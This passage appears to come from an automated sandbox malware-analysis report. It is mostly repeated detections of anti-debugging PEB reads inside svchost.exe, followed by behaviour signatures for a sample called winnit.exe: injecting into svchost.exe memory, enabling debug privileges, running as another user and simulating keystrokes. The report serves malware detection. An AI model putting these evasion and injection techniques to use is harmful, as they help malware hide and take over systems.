Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B470C0 mov eax, dword ptr fs:[00000030h] 7_2_03B470C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B470C0 mov ecx, dword ptr fs:[00000030h] 7_2_03B470C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B470C0 mov ecx, dword ptr fs:[00000030h] 7_2_03B470C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B470C0 mov eax, dword ptr fs:[00000030h] 7_2_03B470C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B470C0 mov ecx, dword ptr fs:[00000030h] 7_2_03B470C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B470C0 mov ecx, dword ptr fs:[00000030h] 7_2_03B470C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B470C0 mov eax, dword ptr fs:[00000030h] 7_2_03B470C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B470C0 mov eax, dword ptr fs:[00000030h] 7_2_03B470C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B470C0 mov eax, dword ptr fs:[00000030h] 7_2_03B470C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B470C0 mov eax, dword ptr fs:[00000030h] 7_2_03B470C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B470C0 mov eax, dword ptr fs:[00000030h] 7_2_03B470C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B470C0 mov eax, dword ptr fs:[00000030h] 7_2_03B470C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B470C0 mov eax, dword ptr fs:[00000030h] 7_2_03B470C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B470C0 mov eax, dword ptr fs:[00000030h] 7_2_03B470C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B470C0 mov eax, dword ptr fs:[00000030h] 7_2_03B470C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B470C0 mov eax, dword ptr fs:[00000030h] 7_2_03B470C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B470C0 mov eax, dword ptr fs:[00000030h] 7_2_03B470C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B470C0 mov eax, dword ptr fs:[00000030h] 7_2_03B470C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BAD0C0 mov eax, dword ptr fs:[00000030h] 7_2_03BAD0C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BAD0C0 mov eax, dword ptr fs:[00000030h] 7_2_03BAD0C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BF903E mov eax, dword ptr fs:[00000030h] 7_2_03BF903E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BF903E mov eax, dword ptr fs:[00000030h] 7_2_03BF903E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BF903E mov eax, dword ptr fs:[00000030h] 7_2_03BF903E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BF903E mov eax, dword ptr fs:[00000030h] 7_2_03BF903E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B2A020 mov eax, dword ptr fs:[00000030h] 7_2_03B2A020
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B2C020 mov eax, dword ptr fs:[00000030h] 7_2_03B2C020
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03C05060 mov eax, dword ptr fs:[00000030h] 7_2_03C05060
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B4E016 mov eax, dword ptr fs:[00000030h] 7_2_03B4E016
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B4E016 mov eax, dword ptr fs:[00000030h] 7_2_03B4E016
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B4E016 mov eax, dword ptr fs:[00000030h] 7_2_03B4E016
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B4E016 mov eax, dword ptr fs:[00000030h] 7_2_03B4E016
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BB4000 mov ecx, dword ptr fs:[00000030h] 7_2_03BB4000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B41070 mov eax, dword ptr fs:[00000030h] 7_2_03B41070
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B41070 mov ecx, dword ptr fs:[00000030h] 7_2_03B41070
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B41070 mov eax, dword ptr fs:[00000030h] 7_2_03B41070
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B41070 mov eax, dword ptr fs:[00000030h] 7_2_03B41070
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B41070 mov eax, dword ptr fs:[00000030h] 7_2_03B41070
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B41070 mov eax, dword ptr fs:[00000030h] 7_2_03B41070
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B41070 mov eax, dword ptr fs:[00000030h] 7_2_03B41070
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B41070 mov eax, dword ptr fs:[00000030h] 7_2_03B41070
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B41070 mov eax, dword ptr fs:[00000030h] 7_2_03B41070
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B41070 mov eax, dword ptr fs:[00000030h] 7_2_03B41070
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B41070 mov eax, dword ptr fs:[00000030h] 7_2_03B41070
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B41070 mov eax, dword ptr fs:[00000030h] 7_2_03B41070
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B41070 mov eax, dword ptr fs:[00000030h] 7_2_03B41070
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B5C073 mov eax, dword ptr fs:[00000030h] 7_2_03B5C073
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BAD070 mov ecx, dword ptr fs:[00000030h] 7_2_03BAD070
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BB106E mov eax, dword ptr fs:[00000030h] 7_2_03BB106E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B32050 mov eax, dword ptr fs:[00000030h] 7_2_03B32050
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BD705E mov ebx, dword ptr fs:[00000030h] 7_2_03BD705E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BD705E mov eax, dword ptr fs:[00000030h] 7_2_03BD705E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B5B052 mov eax, dword ptr fs:[00000030h] 7_2_03B5B052
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BB6050 mov eax, dword ptr fs:[00000030h] 7_2_03BB6050
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B5D7B0 mov eax, dword ptr fs:[00000030h] 7_2_03B5D7B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B2F7BA mov eax, dword ptr fs:[00000030h] 7_2_03B2F7BA
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B2F7BA mov eax, dword ptr fs:[00000030h] 7_2_03B2F7BA
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B2F7BA mov eax, dword ptr fs:[00000030h] 7_2_03B2F7BA
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B2F7BA mov eax, dword ptr fs:[00000030h] 7_2_03B2F7BA
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B2F7BA mov eax, dword ptr fs:[00000030h] 7_2_03B2F7BA
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B2F7BA mov eax, dword ptr fs:[00000030h] 7_2_03B2F7BA
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B2F7BA mov eax, dword ptr fs:[00000030h] 7_2_03B2F7BA
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B2F7BA mov eax, dword ptr fs:[00000030h] 7_2_03B2F7BA
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B2F7BA mov eax, dword ptr fs:[00000030h] 7_2_03B2F7BA
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BB97A9 mov eax, dword ptr fs:[00000030h] 7_2_03BB97A9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BBF7AF mov eax, dword ptr fs:[00000030h] 7_2_03BBF7AF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BBF7AF mov eax, dword ptr fs:[00000030h] 7_2_03BBF7AF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BBF7AF mov eax, dword ptr fs:[00000030h] 7_2_03BBF7AF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BBF7AF mov eax, dword ptr fs:[00000030h] 7_2_03BBF7AF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BBF7AF mov eax, dword ptr fs:[00000030h] 7_2_03BBF7AF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B307AF mov eax, dword ptr fs:[00000030h] 7_2_03B307AF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BEF78A mov eax, dword ptr fs:[00000030h] 7_2_03BEF78A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B347FB mov eax, dword ptr fs:[00000030h] 7_2_03B347FB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B347FB mov eax, dword ptr fs:[00000030h] 7_2_03B347FB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B3D7E0 mov ecx, dword ptr fs:[00000030h] 7_2_03B3D7E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B527ED mov eax, dword ptr fs:[00000030h] 7_2_03B527ED
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B527ED mov eax, dword ptr fs:[00000030h] 7_2_03B527ED
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B527ED mov eax, dword ptr fs:[00000030h] 7_2_03B527ED
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B3C7C0 mov eax, dword ptr fs:[00000030h] 7_2_03B3C7C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B357C0 mov eax, dword ptr fs:[00000030h] 7_2_03B357C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B357C0 mov eax, dword ptr fs:[00000030h] 7_2_03B357C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B357C0 mov eax, dword ptr fs:[00000030h] 7_2_03B357C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03C037B6 mov eax, dword ptr fs:[00000030h] 7_2_03C037B6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BB07C3 mov eax, dword ptr fs:[00000030h] 7_2_03BB07C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B29730 mov eax, dword ptr fs:[00000030h] 7_2_03B29730
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B29730 mov eax, dword ptr fs:[00000030h] 7_2_03B29730
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B65734 mov eax, dword ptr fs:[00000030h] 7_2_03B65734
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B3973A mov eax, dword ptr fs:[00000030h] 7_2_03B3973A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B3973A mov eax, dword ptr fs:[00000030h] 7_2_03B3973A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03C03749 mov eax, dword ptr fs:[00000030h] 7_2_03C03749
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B6273C mov eax, dword ptr fs:[00000030h] 7_2_03B6273C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B6273C mov ecx, dword ptr fs:[00000030h] 7_2_03B6273C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B6273C mov eax, dword ptr fs:[00000030h] 7_2_03B6273C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BAC730 mov eax, dword ptr fs:[00000030h] 7_2_03BAC730
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BEF72E mov eax, dword ptr fs:[00000030h] 7_2_03BEF72E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B33720 mov eax, dword ptr fs:[00000030h] 7_2_03B33720
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B4F720 mov eax, dword ptr fs:[00000030h] 7_2_03B4F720
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B4F720 mov eax, dword ptr fs:[00000030h] 7_2_03B4F720
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B4F720 mov eax, dword ptr fs:[00000030h] 7_2_03B4F720
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BF972B mov eax, dword ptr fs:[00000030h] 7_2_03BF972B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B6C720 mov eax, dword ptr fs:[00000030h] 7_2_03B6C720
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B6C720 mov eax, dword ptr fs:[00000030h] 7_2_03B6C720
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B30710 mov eax, dword ptr fs:[00000030h] 7_2_03B30710
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B60710 mov eax, dword ptr fs:[00000030h] 7_2_03B60710
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B6F71F mov eax, dword ptr fs:[00000030h] 7_2_03B6F71F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B6F71F mov eax, dword ptr fs:[00000030h] 7_2_03B6F71F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B37703 mov eax, dword ptr fs:[00000030h] 7_2_03B37703
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B35702 mov eax, dword ptr fs:[00000030h] 7_2_03B35702
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B35702 mov eax, dword ptr fs:[00000030h] 7_2_03B35702
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B6C700 mov eax, dword ptr fs:[00000030h] 7_2_03B6C700
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B38770 mov eax, dword ptr fs:[00000030h] 7_2_03B38770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B40770 mov eax, dword ptr fs:[00000030h] 7_2_03B40770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B40770 mov eax, dword ptr fs:[00000030h] 7_2_03B40770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B40770 mov eax, dword ptr fs:[00000030h] 7_2_03B40770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B40770 mov eax, dword ptr fs:[00000030h] 7_2_03B40770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B40770 mov eax, dword ptr fs:[00000030h] 7_2_03B40770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B40770 mov eax, dword ptr fs:[00000030h] 7_2_03B40770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B40770 mov eax, dword ptr fs:[00000030h] 7_2_03B40770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B40770 mov eax, dword ptr fs:[00000030h] 7_2_03B40770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B40770 mov eax, dword ptr fs:[00000030h] 7_2_03B40770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B40770 mov eax, dword ptr fs:[00000030h] 7_2_03B40770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B40770 mov eax, dword ptr fs:[00000030h] 7_2_03B40770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B40770 mov eax, dword ptr fs:[00000030h] 7_2_03B40770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B2B765 mov eax, dword ptr fs:[00000030h] 7_2_03B2B765
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B2B765 mov eax, dword ptr fs:[00000030h] 7_2_03B2B765
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B2B765 mov eax, dword ptr fs:[00000030h] 7_2_03B2B765
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B2B765 mov eax, dword ptr fs:[00000030h] 7_2_03B2B765
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B30750 mov eax, dword ptr fs:[00000030h] 7_2_03B30750
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B72750 mov eax, dword ptr fs:[00000030h] 7_2_03B72750
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B72750 mov eax, dword ptr fs:[00000030h] 7_2_03B72750
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BB4755 mov eax, dword ptr fs:[00000030h] 7_2_03BB4755
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B43740 mov eax, dword ptr fs:[00000030h] 7_2_03B43740
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B43740 mov eax, dword ptr fs:[00000030h] 7_2_03B43740
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B43740 mov eax, dword ptr fs:[00000030h] 7_2_03B43740
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B6674D mov esi, dword ptr fs:[00000030h] 7_2_03B6674D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B6674D mov eax, dword ptr fs:[00000030h] 7_2_03B6674D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B6674D mov eax, dword ptr fs:[00000030h] 7_2_03B6674D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03C0B73C mov eax, dword ptr fs:[00000030h] 7_2_03C0B73C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03C0B73C mov eax, dword ptr fs:[00000030h] 7_2_03C0B73C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03C0B73C mov eax, dword ptr fs:[00000030h] 7_2_03C0B73C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03C0B73C mov eax, dword ptr fs:[00000030h] 7_2_03C0B73C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B276B2 mov eax, dword ptr fs:[00000030h] 7_2_03B276B2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B276B2 mov eax, dword ptr fs:[00000030h] 7_2_03B276B2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B276B2 mov eax, dword ptr fs:[00000030h] 7_2_03B276B2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B666B0 mov eax, dword ptr fs:[00000030h] 7_2_03B666B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B6C6A6 mov eax, dword ptr fs:[00000030h] 7_2_03B6C6A6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B2D6AA mov eax, dword ptr fs:[00000030h] 7_2_03B2D6AA
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B2D6AA mov eax, dword ptr fs:[00000030h] 7_2_03B2D6AA
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B34690 mov eax, dword ptr fs:[00000030h] 7_2_03B34690
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B34690 mov eax, dword ptr fs:[00000030h] 7_2_03B34690
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BB368C mov eax, dword ptr fs:[00000030h] 7_2_03BB368C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BB368C mov eax, dword ptr fs:[00000030h] 7_2_03BB368C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BB368C mov eax, dword ptr fs:[00000030h] 7_2_03BB368C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BB368C mov eax, dword ptr fs:[00000030h] 7_2_03BB368C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BAE6F2 mov eax, dword ptr fs:[00000030h] 7_2_03BAE6F2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BAE6F2 mov eax, dword ptr fs:[00000030h] 7_2_03BAE6F2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BAE6F2 mov eax, dword ptr fs:[00000030h] 7_2_03BAE6F2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BAE6F2 mov eax, dword ptr fs:[00000030h] 7_2_03BAE6F2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BB06F1 mov eax, dword ptr fs:[00000030h] 7_2_03BB06F1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BB06F1 mov eax, dword ptr fs:[00000030h] 7_2_03BB06F1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BED6F0 mov eax, dword ptr fs:[00000030h] 7_2_03BED6F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BC36EE mov eax, dword ptr fs:[00000030h] 7_2_03BC36EE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BC36EE mov eax, dword ptr fs:[00000030h] 7_2_03BC36EE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BC36EE mov eax, dword ptr fs:[00000030h] 7_2_03BC36EE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BC36EE mov eax, dword ptr fs:[00000030h] 7_2_03BC36EE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BC36EE mov eax, dword ptr fs:[00000030h] 7_2_03BC36EE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BC36EE mov eax, dword ptr fs:[00000030h] 7_2_03BC36EE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B5D6E0 mov eax, dword ptr fs:[00000030h] 7_2_03B5D6E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B5D6E0 mov eax, dword ptr fs:[00000030h] 7_2_03B5D6E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B636EF mov eax, dword ptr fs:[00000030h] 7_2_03B636EF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B6A6C7 mov ebx, dword ptr fs:[00000030h] 7_2_03B6A6C7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B6A6C7 mov eax, dword ptr fs:[00000030h] 7_2_03B6A6C7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B3B6C0 mov eax, dword ptr fs:[00000030h] 7_2_03B3B6C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B3B6C0 mov eax, dword ptr fs:[00000030h] 7_2_03B3B6C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B3B6C0 mov eax, dword ptr fs:[00000030h] 7_2_03B3B6C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B3B6C0 mov eax, dword ptr fs:[00000030h] 7_2_03B3B6C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B3B6C0 mov eax, dword ptr fs:[00000030h] 7_2_03B3B6C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B3B6C0 mov eax, dword ptr fs:[00000030h] 7_2_03B3B6C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BF16CC mov eax, dword ptr fs:[00000030h] 7_2_03BF16CC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BF16CC mov eax, dword ptr fs:[00000030h] 7_2_03BF16CC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BF16CC mov eax, dword ptr fs:[00000030h] 7_2_03BF16CC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BF16CC mov eax, dword ptr fs:[00000030h] 7_2_03BF16CC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BEF6C7 mov eax, dword ptr fs:[00000030h] 7_2_03BEF6C7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B616CF mov eax, dword ptr fs:[00000030h] 7_2_03B616CF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B4E627 mov eax, dword ptr fs:[00000030h] 7_2_03B4E627
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B2F626 mov eax, dword ptr fs:[00000030h] 7_2_03B2F626
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B2F626 mov eax, dword ptr fs:[00000030h] 7_2_03B2F626
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B2F626 mov eax, dword ptr fs:[00000030h] 7_2_03B2F626
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B2F626 mov eax, dword ptr fs:[00000030h] 7_2_03B2F626
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B2F626 mov eax, dword ptr fs:[00000030h] 7_2_03B2F626
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B2F626 mov eax, dword ptr fs:[00000030h] 7_2_03B2F626
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B2F626 mov eax, dword ptr fs:[00000030h] 7_2_03B2F626
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B2F626 mov eax, dword ptr fs:[00000030h] 7_2_03B2F626
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B2F626 mov eax, dword ptr fs:[00000030h] 7_2_03B2F626
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B66620 mov eax, dword ptr fs:[00000030h] 7_2_03B66620
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B68620 mov eax, dword ptr fs:[00000030h] 7_2_03B68620
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B3262C mov eax, dword ptr fs:[00000030h] 7_2_03B3262C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B33616 mov eax, dword ptr fs:[00000030h] 7_2_03B33616
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B33616 mov eax, dword ptr fs:[00000030h] 7_2_03B33616
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B72619 mov eax, dword ptr fs:[00000030h] 7_2_03B72619
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B61607 mov eax, dword ptr fs:[00000030h] 7_2_03B61607
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BAE609 mov eax, dword ptr fs:[00000030h] 7_2_03BAE609
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B6F603 mov eax, dword ptr fs:[00000030h] 7_2_03B6F603
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B4260B mov eax, dword ptr fs:[00000030h] 7_2_03B4260B
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\AppData\Roaming\winnit.exe Code function: 6_2_00B080A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation, 6_2_00B080A9
Enables debug privileges
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Roaming\winnit.exe Code function: 6_2_00ADA124 SetUnhandledExceptionFilter, 6_2_00ADA124
Source: C:\Users\user\AppData\Roaming\winnit.exe Code function: 6_2_00ADA155 SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_00ADA155

HIPS / PFW / Operating System Protection Evasion
barindex
Maps a DLL or memory area into another process
Source: C:\Users\user\AppData\Roaming\winnit.exe Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write Jump to behavior
Writes to foreign memory regions
Source: C:\Users\user\AppData\Roaming\winnit.exe Memory written: C:\Windows\SysWOW64\svchost.exe base: 3089008 Jump to behavior
Contains functionality to execute programs as a different user
Source: C:\Users\user\AppData\Roaming\winnit.exe Code function: 6_2_00B087B1 LogonUserW, 6_2_00B087B1
Contains functionality to launch a program with higher privileges
Source: C:\Users\user\AppData\Roaming\winnit.exe Code function: 6_2_00AB3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 6_2_00AB3B3A
Contains functionality to simulate keystroke presses
Source: C:\Users\user\AppData\Roaming\winnit.exe Code function: 6_2_00AB48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 6_2_00AB48D7
Contains functionality to simulate mouse events
